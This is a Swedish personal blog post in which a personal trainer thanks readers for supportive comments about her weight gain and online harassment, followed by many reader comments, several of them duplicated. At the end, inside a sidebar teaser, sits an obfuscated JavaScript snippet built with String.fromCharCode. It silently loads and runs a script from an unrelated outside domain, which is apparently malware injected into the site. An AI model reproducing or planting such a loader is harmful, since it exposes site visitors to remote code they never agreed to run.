WORD! Tacksamhet…..

 

OLYMPUS DIGITAL CAMERA

TACKSAM 💖

Godmorgon fina du! NĂ€r jag vaknade idag gick jag in och lĂ€ste  igenom alla kommentarer igen. Dom som ni lĂ€mnade i inlĂ€gget kring min viktuppgĂ„ng. Jag blev sĂ„  rörd, Igen. TĂ„rögd faktiskt….. jag vill gĂ„ in och svara alla, en efter en… personligen. Men jag kĂ€nde att jag inte riktigt har ork till det.

SĂ„ dĂ€rför vill jag nu berĂ€tta för dig. MĂ„nga av er skrev att det var första gĂ„ngen ni kommenterade. Du ska veta en sak, att DIN kommentar, din omtanke betyder JÄTTE mycket för mig đŸ™đŸ»

Just i detta inlÀgget sÄ var det Àven mycket tips och rÄd gÀllande sköldkörteln. MÄnga av er vÄgade dela med sig av sina erfarenheter kring detta. GRYMT uppskattat!

Men Ă€ven alla fina ord och tankar kring bĂ„de mig, min viktuppgĂ„ng och min hĂ€lsa! Jag önskar att vi alla hade kunnat trĂ€ffas, umgĂ„tts och pratat. LĂ€rt kĂ€nna varandra utanför bloggen. För det Ă€r ju sĂ„hĂ€r, ni fĂ„r följa stora delar av mitt liv. I bĂ„de med och motgĂ„ng. Jag har haft ett riktigt skitĂ„r! PĂ„ ALLA plan! Trots det har ni funnits vid min sida.. Den tacksamhet jag kĂ€nner för det kan jag inte rĂ€ttvist beskriva med ord.❀

Nu stÄr jag Ànnu en gÄng inför ett stÄr beslut. Beslut Àr egentligen redan taget och jag kommer snart att kunna dela med mig av det...

Även om jag fortfarande krĂ€lat runt pĂ„ botten, för det gör jag stundvis. Ångesten, tröttheten och min sorg Ă€r nĂ„gonting jag dagligen jobbar med. MEN, jag ser ljuset i tunneln, jag vet vad som Ă€r bĂ€st för mig, för Ludvig och för min hĂ€lsa. Hur ont detta beslut Ă€n gjorde att ta, sĂ„ kĂ€nns det Ă€ndĂ„ helt rĂ€tt i magen, i hjĂ€rtat och i sjĂ€len. Stora förĂ€ndringar Ă€nnu en gĂ„ng. Men nu kommer det att bli bra, pĂ„ riktigt.

Nu kommer jag att börja om. Jag kommer fortsĂ€tta jobba med mig sjĂ€lv, fortsĂ€tta bearbeta alla dom kĂ€nslor som jag stĂ€ngt inom mig under mĂ„nga, mĂ„nga Ă„r. Jag har börjat landa, jag har landat pĂ„ fötterna. Jag kommer komma tillbaka starkare Ă€n nĂ„gonsin đŸ‘ŠđŸ»

Allt nÀthat, och vuxen mobbning jag har och fortfarande utsÀtts för blir bara min bensin. Det ger mig energi, till att ignorera trollen och fortsÀtta med precis det jag gör. Bygga upp mig sjÀlv och sÀtta upp tydliga riltlinjer för att nÄ mina mÄl. För att fÄ lugn och ro och fÄ mÄ riktigt bra igen.

OLYMPUS DIGITAL CAMERA

NĂ€ttroll, avundsjuka och bittra mĂ€nniskor kommer alltid att finnas. Under ett Ă„rs tid har det cirkulerat extremt mycket rykten och falska pĂ„stĂ„enden. Men Spekulationer, skitsnack och pĂ„hopp likt dessa Ă€r nĂ„got jag vant mig vid och jag ser de snarare som ett bevis pĂ„ att jag gör nĂ„got rĂ€tt nĂ€r mĂ€nniskor inte hittar annat att skriva om Ă€n just pĂ„hittđŸ‘ŠđŸ».  

Åter igen, STORT TACK för att du Ă€r duđŸ™đŸ»â€

/Kram My Martens

50 Komentarer

 1. Tacksamhet Ă€r nĂ„got av det finaste man kan kĂ€nna! Tack sjĂ€lv för att du visar vad vĂ„ra kommentarer betyder… Ă„ förresten; jĂ€ttefina bilder! Tar du dem sjĂ€lv eller nĂ„gon annan som Ă€r med och tar… kram maria e

 2. Vad skönt att du kommit till ett beslut vad det Àn Àr. Ovissheten pÄ hur du ska göra Àr vÀrre Àn beslutet. Vi hÀrute vet att du tÀnker pÄ det bÀsta för Ludvig. Det Àr vi övertygade om !!!
  Ps. Nu Àr det dags att plocka fram korgen med pussmunnen pÄ. Jag Àlskar verkligen den.
  Kram

 3. Hej My!
  Har aldrig kommenterat hÀr inne innan. Men jag Àr en daglig lÀsare av din blogg.
  Du Ă€r en kĂ€mpe i mina ögon. Du ger inte upp, du kavlar upp armarna och tar nya tag. Du försöker att lösa alla dina problem och du lyckas göra de ocksĂ„. Även om de ibland inte gĂ„r rakt fram och lĂ€tt sĂ„ gör du de.
  Jag har funderat ett tag pÄ hur det Àr med din bÀsta vÀn, dÄ menar jag Tezz?
  De kÀnns som de var sÄ lÀngesedan du skrev om henne. Hoppas hon mÄr bra!
  Djur Àr ju de bÀsta lyssnarna, de bÀsta till att trösta och framförallt de bÀsta pÄ att fÄ ett inre lugn.
  Har sjÀlv haft en trogen labbe ?
  Till alla de som skriver att du ska sluta skriva för du inte kan stava, till alla dem som skriver du Àr tjock, ful och fet och allt vad dom skriver.
  VĂ€nd pĂ„ de… jag tror enbart dĂ€r finns en stor stor avundsjuka faktiskt.
  Dom vill försöka trycka ner dig men DU… DOM lyckas inte och de gillar jag!!
  Stor kram till dig frÄn en skÄnetös som lÀser din blogg dagligen.

 4. Tacksamhet Ă€r nĂ„got av det finaste man kan kĂ€nna! Tack sjĂ€lv för att du visar vad vĂ„ra kommentarer betyder… Ă„ förresten; jĂ€ttefina bilder! Tar du dem sjĂ€lv eller nĂ„gon annan som Ă€r med och tar… kram maria e

 5. Fina My?
  LÀser ofta din blogg Ä det du delar med dej! Du ska veta att du Àr en otroligt stark tjej! Du Àr grym!
  Va rÀdd om dej Ä hoppas allt löser sej till det bÀsta för dej Ä lilleman??
  MĂ„nga Varma kramar till dig!

 6. Vad skönt att du kommit till ett beslut vad det Àn Àr. Ovissheten pÄ hur du ska göra Àr vÀrre Àn beslutet. Vi hÀrute vet att du tÀnker pÄ det bÀsta för Ludvig. Det Àr vi övertygade om !!!
  Ps. Nu Àr det dags att plocka fram korgen med pussmunnen pÄ. Jag Àlskar verkligen den.
  Kram

 7. Hej My!
  Har aldrig kommenterat hÀr inne innan. Men jag Àr en daglig lÀsare av din blogg.
  Du Ă€r en kĂ€mpe i mina ögon. Du ger inte upp, du kavlar upp armarna och tar nya tag. Du försöker att lösa alla dina problem och du lyckas göra de ocksĂ„. Även om de ibland inte gĂ„r rakt fram och lĂ€tt sĂ„ gör du de.
  Jag har funderat ett tag pÄ hur det Àr med din bÀsta vÀn, dÄ menar jag Tezz?
  De kÀnns som de var sÄ lÀngesedan du skrev om henne. Hoppas hon mÄr bra!
  Djur Àr ju de bÀsta lyssnarna, de bÀsta till att trösta och framförallt de bÀsta pÄ att fÄ ett inre lugn.
  Har sjĂ€lv haft en trogen labbe 🙂

  Till alla de som skriver att du ska sluta skriva för du inte kan stava, till alla dem som skriver du Àr tjock, ful och fet och allt vad dom skriver.
  VĂ€nd pĂ„ de… jag tror enbart dĂ€r finns en stor stor avundsjuka faktiskt.
  Dom vill försöka trycka ner dig men DU… DOM lyckas inte och de gillar jag!!
  Stor kram till dig frÄn en skÄnetös som lÀser din blogg dagligen.

 8. Du Àr sÄ Àkta. Jag vet inte hur jag ska beskriva det men det Àr som att du Àr 100 % Àkta, ingen fasad, allt kommer direkt frÄn hjÀrtat osv. Det Àr extremt sÀllsynt med sÄna mÀnniskor. Och speciellt pÄ internet dÀr alla vill visa upp nÄgot dom inte Àr. Det Àr faktiskt helt makalöst hur Àkta du Àr. Det gÄr att lÀsa vÀldigt enkelt mellan raderna att du Àr vÀldigt Àkta. Det mÀrks tydligt. Och det mÀrks ocksÄ vÀldigt tydligt nÀr nÄgon inte Àr det nÀr nÄgon bara visar upp fin yta och en fasad. Jag lÀser nÀstan inga andra bloggar Àn din lÀngre. HÀr inne fÄr man sanning och Àkthet. Vilket Àr det man vill ha.

 9. HÀrligt att höra att du ÀndÄ kÀnner att du Àr pÄ rÀtt vÀg.SÄ som du blivit behandlad och det du varit med om under det senaste Äret skulle knÀcka de flesta. Skickar en stor varm kram och ett lycka till med ditt nya liv.

 10. Skönt att höra att du inte lĂ„ter dig slĂ„s ner Ă€ven om jag förstĂ„r att du stundtals gör de. Har sjĂ€lv haft/har ett fruktansvĂ€rt Ă„r med vuxen mobbing pĂ„ sĂ„ nĂ€ra hĂ„ll sĂ„ att de Ă€r i min vardag. Har en underbar son som fĂ„r mig att vilja fortsĂ€tta men önskar bara att fĂ„ vara lycklig i lugn och ro. Är en mĂ€nniska som alltid ger av mig sjĂ€lv till andra och dĂ„ kĂ€nns de Ă€nnu vĂ€rre nĂ€r man blir felaktigt utsatt och dömd.
  Försöker ÀndÄ fortsÀtta mitt liv och har med de börjat trÀna för att mÄ bra bÄde fysiskt och psykiskt.
  Lycka till My och styrke kramar i massor ❀

 11. Fina My💕
  LÀser ofta din blogg Ä det du delar med dej! Du ska veta att du Àr en otroligt stark tjej! Du Àr grym!
  Va rĂ€dd om dej Ă„ hoppas allt löser sej till det bĂ€sta för dej Ă„ lilleman💕💕
  MĂ„nga Varma kramar till dig!

 12. Du Àr sÄ Àkta. Jag vet inte hur jag ska beskriva det men det Àr som att du Àr 100 % Àkta, ingen fasad, allt kommer direkt frÄn hjÀrtat osv. Det Àr extremt sÀllsynt med sÄna mÀnniskor. Och speciellt pÄ internet dÀr alla vill visa upp nÄgot dom inte Àr. Det Àr faktiskt helt makalöst hur Àkta du Àr. Det gÄr att lÀsa vÀldigt enkelt mellan raderna att du Àr vÀldigt Àkta. Det mÀrks tydligt. Och det mÀrks ocksÄ vÀldigt tydligt nÀr nÄgon inte Àr det nÀr nÄgon bara visar upp fin yta och en fasad. Jag lÀser nÀstan inga andra bloggar Àn din lÀngre. HÀr inne fÄr man sanning och Àkthet. Vilket Àr det man vill ha.

 13. HÀrligt att höra att du ÀndÄ kÀnner att du Àr pÄ rÀtt vÀg.SÄ som du blivit behandlad och det du varit med om under det senaste Äret skulle knÀcka de flesta. Skickar en stor varm kram och ett lycka till med ditt nya liv.

 14. Du Àr en enormt fin och Àrligt hÀrlig inspiratör till mycket!!
  BÄde vad gÀller trÀna g, familjemys o h rent allmÀnt. En pt Àr i te lika med hÀlsofreak!
  Klart man kan lÀgga pÄ sig nÄgra kg. Men vad gör det?! NÀ du tÀnker rÀtt för. Inter stressa upp sig av detta!
  Helt plötsligt DN dag pekar vÄgen nerÄt igen. Om den i te gör det dÄ spelar det i gen till ÀndÄn! Du lever hÀlsosamt och Àr fin precis som du Àr oavsett kg!
  Puss o kram fina du

 15. Skönt att höra att du inte lĂ„ter dig slĂ„s ner Ă€ven om jag förstĂ„r att du stundtals gör de. Har sjĂ€lv haft/har ett fruktansvĂ€rt Ă„r med vuxen mobbing pĂ„ sĂ„ nĂ€ra hĂ„ll sĂ„ att de Ă€r i min vardag. Har en underbar son som fĂ„r mig att vilja fortsĂ€tta men önskar bara att fĂ„ vara lycklig i lugn och ro. Är en mĂ€nniska som alltid ger av mig sjĂ€lv till andra och dĂ„ kĂ€nns de Ă€nnu vĂ€rre nĂ€r man blir felaktigt utsatt och dömd.
  Försöker ÀndÄ fortsÀtta mitt liv och har med de börjat trÀna för att mÄ bra bÄde fysiskt och psykiskt.
  Lycka till My och styrke kramar i massor ❀

 16. Du Àr en enormt fin och Àrligt hÀrlig inspiratör till mycket!!
  BÄde vad gÀller trÀna g, familjemys o h rent allmÀnt. En pt Àr i te lika med hÀlsofreak!
  Klart man kan lÀgga pÄ sig nÄgra kg. Men vad gör det?! NÀ du tÀnker rÀtt för. Inter stressa upp sig av detta!
  Helt plötsligt DN dag pekar vÄgen nerÄt igen. Om den i te gör det dÄ spelar det i gen till ÀndÄn! Du lever hÀlsosamt och Àr fin precis som du Àr oavsett kg!
  Puss o kram fina du

 17. KĂ€ra My
  Du Ă€r helt fantastisk fin och i mina ögon normal. Hur mĂ„nga ser ut som ”idealet” . Jag har svĂ„rt för nĂ€thatet. Tror inte nĂ„gon gĂ„r fram till en helt frĂ€mmande mĂ€nniska och sĂ€ger att man Ă€r ful och tjock. Men pĂ„ sociala medier Ă€r ALLT tillĂ„tet att sĂ€ga enlig ”trollen” . Du Ă€r fantastisk och helt underbar!
  MĂ„nga styrke kramar till dig

 18. Ja du, tyvĂ€rr finns det inte nĂ„gon biologisk möjlighet för nutidsmĂ€nniskan att kvĂ€vas av sin egen elakhet. TĂ€nk vad tyst och skönt det vore i vĂ„r vĂ€rld om sĂ„ vore fallet! ? Men nej, de dĂ€r nedrans trollen fĂ„r precis lika mycket luft som alla oss andra… Men nog vore det rĂ€tt skönt om man kunde reducera syret för en del! Du ska överhuvudtaget inte noja över vikten! Det finns ingen normal mĂ€nniska som tycker att du Ă€r överviktig. Dock tĂ€nkte jag pĂ„ det du skrev om kilona som bara kommit trots trĂ€ning. Jag var pĂ„ en jĂ€tteintressant förelĂ€sning dĂ€r förelĂ€saren pratade om det kortisol vi sĂ€tter igĂ„ng och utsöndrar i kroppen om vi Ă€r utsatta för stark stress eller liknande. Enligt honom kan man fĂ„ motsatt effekt av att trĂ€na hĂ„rt om man har mycket kortisol i kroppen och man kan gĂ„ upp i vikt istĂ€llet. Minns inte riktigt detaljerna, men han menade att ibland kan det vara bĂ€ttre med lugnare trĂ€ning, typ yoga och liknande om man gĂ„r igenom mycket psykisk stress eftersom det inte frigörs lika mycket kortisol dĂ„. Kortisolet kan tydligen bidra till viktuppgĂ„ng sĂ„ledes. Men som sagt, bry dig inte om trollen. För sĂ„ lĂ€nge de inte kommer med syrekran pĂ„ ryggen sĂ„ Ă€r vi tvungna att hantera dem pĂ„ bĂ€sta sĂ€tt, och det Ă€r: total nonchalans! Sköt om dig! Kram! ?

 19. Idag har vi handlat blommor av din pappa pÄ öland. Han var lila glad och trevlig som dej , och fina blommor till bra priser. Vi saknar dina fina blommor. Hoppas du kommer tillbax. /En stammis ?

 20. KĂ€ra My
  Du Ă€r helt fantastisk fin och i mina ögon normal. Hur mĂ„nga ser ut som ”idealet” . Jag har svĂ„rt för nĂ€thatet. Tror inte nĂ„gon gĂ„r fram till en helt frĂ€mmande mĂ€nniska och sĂ€ger att man Ă€r ful och tjock. Men pĂ„ sociala medier Ă€r ALLT tillĂ„tet att sĂ€ga enlig ”trollen” . Du Ă€r fantastisk och helt underbar!
  MĂ„nga styrke kramar till dig

 21. Det Àr bara att hÄlla med alla fina kommentarer som du fÄr.
  Du förtjÀnar dom.
  SÄ mycket kÀnsla och vÀrme.
  Har sagt det tidigare. . Du fixar detta och gör det beslutet som Àr rÀtt.
  Trevlig helg.
  Kram K

 22. Ja du, tyvĂ€rr finns det inte nĂ„gon biologisk möjlighet för nutidsmĂ€nniskan att kvĂ€vas av sin egen elakhet. TĂ€nk vad tyst och skönt det vore i vĂ„r vĂ€rld om sĂ„ vore fallet! 🙂 Men nej, de dĂ€r nedrans trollen fĂ„r precis lika mycket luft som alla oss andra… Men nog vore det rĂ€tt skönt om man kunde reducera syret för en del! Du ska överhuvudtaget inte noja över vikten! Det finns ingen normal mĂ€nniska som tycker att du Ă€r överviktig. Dock tĂ€nkte jag pĂ„ det du skrev om kilona som bara kommit trots trĂ€ning. Jag var pĂ„ en jĂ€tteintressant förelĂ€sning dĂ€r förelĂ€saren pratade om det kortisol vi sĂ€tter igĂ„ng och utsöndrar i kroppen om vi Ă€r utsatta för stark stress eller liknande. Enligt honom kan man fĂ„ motsatt effekt av att trĂ€na hĂ„rt om man har mycket kortisol i kroppen och man kan gĂ„ upp i vikt istĂ€llet. Minns inte riktigt detaljerna, men han menade att ibland kan det vara bĂ€ttre med lugnare trĂ€ning, typ yoga och liknande om man gĂ„r igenom mycket psykisk stress eftersom det inte frigörs lika mycket kortisol dĂ„. Kortisolet kan tydligen bidra till viktuppgĂ„ng sĂ„ledes. Men som sagt, bry dig inte om trollen. För sĂ„ lĂ€nge de inte kommer med syrekran pĂ„ ryggen sĂ„ Ă€r vi tvungna att hantera dem pĂ„ bĂ€sta sĂ€tt, och det Ă€r: total nonchalans! Sköt om dig! Kram! 🙂

 23. Idag har vi handlat blommor av din pappa pĂ„ öland. Han var lila glad och trevlig som dej , och fina blommor till bra priser. Vi saknar dina fina blommor. Hoppas du kommer tillbax. /En stammis 😀

 24. Ă…Ă„Ă„ fina My! HĂ€rligt för dig o Ludvig att ni Ă€ntligen börjat hitta rĂ€tt. Vilken fantastisk mamma du Ă€r!

 25. Det Àr bara att hÄlla med alla fina kommentarer som du fÄr.
  Du förtjÀnar dom.
  SÄ mycket kÀnsla och vÀrme.
  Har sagt det tidigare. . Du fixar detta och gör det beslutet som Àr rÀtt.
  Trevlig helg.
  Kram K

 26. Hej My
  Har aldrig tidigare kommenterat, men lĂ€ser din blogg varje dag. Jag tycker att du Ă€r grym och blir peppad av att lĂ€sa det du skriver. Du Ă€r fin och duger PRECIS sĂ„ som du Ă€r!! LĂ„t aldrig nĂ„gon annan fĂ„ dig att tro nĂ„gonting annat. Vad dessa mĂ€nniskor skriver sĂ€ger sĂ„ oerhört mycket mer om dem Ă€n vad det gör om dig! ” Don’t let someone dim your light simple because it’s shinning in their eyes ”. Kram och fortsĂ€tt vara den du Ă€r!

 27. Åh hoppas att du kan finna ett lugn o fĂ„ en vĂ€ndning i allt runt dig. Det Ă€r du sĂ„ himla vĂ€rd ?

 28. Ă…Ă„Ă„ fina My! HĂ€rligt för dig o Ludvig att ni Ă€ntligen börjat hitta rĂ€tt. Vilken fantastisk mamma du Ă€r!

 29. Bittra och elaka mÀnniskor Àr det vÀrsta jag vet, fy vad jobbigt de mÄste ha det.
  Bra att du kan nonchalera kommentarerna.
  Helt rÀtt taktik.
  Stor kram

 30. Hej My
  Har aldrig tidigare kommenterat, men lĂ€ser din blogg varje dag. Jag tycker att du Ă€r grym och blir peppad av att lĂ€sa det du skriver. Du Ă€r fin och duger PRECIS sĂ„ som du Ă€r!! LĂ„t aldrig nĂ„gon annan fĂ„ dig att tro nĂ„gonting annat. Vad dessa mĂ€nniskor skriver sĂ€ger sĂ„ oerhört mycket mer om dem Ă€n vad det gör om dig! ” Don’t let someone dim your light simple because it’s shinning in their eyes ”. Kram och fortsĂ€tt vara den du Ă€r!

 31. Ja som sagt sÄ har vi alla en kropp sÄ lÀnge vi fÄr leva.
  Jag tycker att jag Àr för smal och skulle gett en hel del för dina fina kurvor som sitter pÄ helt rÀtt stÀlle. Du Àr superfin och dina haters Àr ju bara för roliga. Jag tror sÀkert att Àven du ser humorn i deras kommentarer.
  Min PT Ă€r en man och dĂ„ Ă€r det ju helt OK med muskulösa ben och armar men det Ă€r vĂ€l som med mycket annat – kvinnor ska vara/se ut pĂ„ ett knepigt sĂ€tt.
  Du vet ju mer om mig om detta men att du gÄtt upp har nog med att göra att du har byggt upp muskler. Hade jag bott i Stockholm hade jag ringt dig direkt för en PT-omgÄng! Bara sÄ att du vet.
  Kram

 32. Åh hoppas att du kan finna ett lugn o fĂ„ en vĂ€ndning i allt runt dig. Det Ă€r du sĂ„ himla vĂ€rd 🙏

 33. Hej,
  Jag jobbar sjÀlv som PT, min kost Àr inte den bÀsta, jag lÀgger ner minst 3000-5000 kr/ mÄnad pÄ skrÀpmat, och har aldrig varit i bÀttre form Àn vad jag Àr nu. Detta Àr pga av att jag har en sjukt hög ÀmnesomsÀttning. All Àr vi olika, en del gÄr upp i vikt lÀttför andra Àr det svÄrare, vissa svettas mycket andra svettas ingenting.
  Alla mÀnniskor Àr olika och unika, man har olika förutsÀttningar.
  Jag har en lite utmaning till er som ifrĂ„ga sĂ€tter My’s kunskaper som PT, ni vet vart hon jobbar boka in ett par pass med henne, jag kan garantera er att ni blir slutkörda.

 34. Bittra och elaka mÀnniskor Àr det vÀrsta jag vet, fy vad jobbigt de mÄste ha det.
  Bra att du kan nonchalera kommentarerna.
  Helt rÀtt taktik.
  Stor kram

 35. Ja som sagt sÄ har vi alla en kropp sÄ lÀnge vi fÄr leva.

  Jag tycker att jag Àr för smal och skulle gett en hel del för dina fina kurvor som sitter pÄ helt rÀtt stÀlle. Du Àr superfin och dina haters Àr ju bara för roliga. Jag tror sÀkert att Àven du ser humorn i deras kommentarer.

  Min PT Ă€r en man och dĂ„ Ă€r det ju helt OK med muskulösa ben och armar men det Ă€r vĂ€l som med mycket annat – kvinnor ska vara/se ut pĂ„ ett knepigt sĂ€tt.

  Du vet ju mer om mig om detta men att du gÄtt upp har nog med att göra att du har byggt upp muskler. Hade jag bott i Stockholm hade jag ringt dig direkt för en PT-omgÄng! Bara sÄ att du vet.

  Kram

 36. Du ÄR stark mestadels, men d e tillĂ„tet att vara down o ledsen. DĂ€rför hoppas jag att du snart kan slĂ€ppa ditt vĂ€rsta beslut som du tagit ever.
  Du ÄR en förebild för unga tjejer, eftsm du inte e ute efter att vara pinnsmal, UTAN har en fantastisk kropp. Ingen man gillar dessa benrangel, det e bara de sjĂ€lva som tycker de e fina.
  SĂ„ fortsĂ€tt att trĂ€na, glöm bara inte bort vilodagen? Jag tycker du Ă€r fantastisk som gĂ„tt igenom Ă„r av vuxenmobbning, elaka pĂ„hopp, t.om pĂ„stĂ„dda rykten? Du e med andra ord en underbar kvinna/tjej som alla borde se upp till. Kramiz o ge Lilleman oxĂ„ en kram. Var rĂ€dda om er o om varandra❀❀

 37. Hej,
  Jag jobbar sjÀlv som PT, min kost Àr inte den bÀsta, jag lÀgger ner minst 3000-5000 kr/ mÄnad pÄ skrÀpmat, och har aldrig varit i bÀttre form Àn vad jag Àr nu. Detta Àr pga av att jag har en sjukt hög ÀmnesomsÀttning. All Àr vi olika, en del gÄr upp i vikt lÀttför andra Àr det svÄrare, vissa svettas mycket andra svettas ingenting.
  Alla mÀnniskor Àr olika och unika, man har olika förutsÀttningar.
  Jag har en lite utmaning till er som ifrĂ„ga sĂ€tter My’s kunskaper som PT, ni vet vart hon jobbar boka in ett par pass med henne, jag kan garantera er att ni blir slutkörda.

 38. Du ÄR stark mestadels, men d e tillĂ„tet att vara down o ledsen. DĂ€rför hoppas jag att du snart kan slĂ€ppa ditt vĂ€rsta beslut som du tagit ever.
  Du ÄR en förebild för unga tjejer, eftsm du inte e ute efter att vara pinnsmal, UTAN har en fantastisk kropp. Ingen man gillar dessa benrangel, det e bara de sjĂ€lva som tycker de e fina.
  SĂ„ fortsĂ€tt att trĂ€na, glöm bara inte bort vilodagen😉 Jag tycker du Ă€r fantastisk som gĂ„tt igenom Ă„r av vuxenmobbning, elaka pĂ„hopp, t.om pĂ„stĂ„dda rykten👍 Du e med andra ord en underbar kvinna/tjej som alla borde se upp till. Kramiz o ge Lilleman oxĂ„ en kram. Var rĂ€dda om er o om varandra❀❀

Svara

LĂ€mna din kommentar!
Ditt namn hÀr

Om du missat..

Andas ut stressen med hjÀlp av djupandning

Andas ut stressen med hjÀlp av djupandning -Hur mÄnga tÀnker egentligen pÄ sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej pĂ„ er! Detta Ă€r en grymt efterlĂ€ngtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/